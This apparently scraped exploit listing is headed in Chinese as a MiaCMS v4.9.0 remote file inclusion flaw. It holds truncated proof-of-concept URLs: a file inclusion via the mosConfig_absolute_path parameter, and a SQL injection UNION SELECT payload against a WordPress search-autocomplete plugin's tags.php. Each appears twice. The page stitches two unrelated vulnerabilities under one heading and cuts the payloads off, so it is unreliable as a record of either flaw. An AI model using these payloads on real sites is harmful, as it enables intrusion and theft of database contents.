MiaCMS v4.9.0远程文件包含漏洞
----------------------[ Exploit ]----------------=>
+> p0c :
http://[site]/components/[c0m_Vuln3r4ble]/vUln3rPag3_.php?mosConfig_absolut......
----------------------[ Exploit ]----------------=>
+> p0c :
http://[site]/components/[c0m_Vuln3r4ble]/vUln3rPag3_.php?mosConfig_absolut......
PoC
http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),cu......
PoC
http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),cu......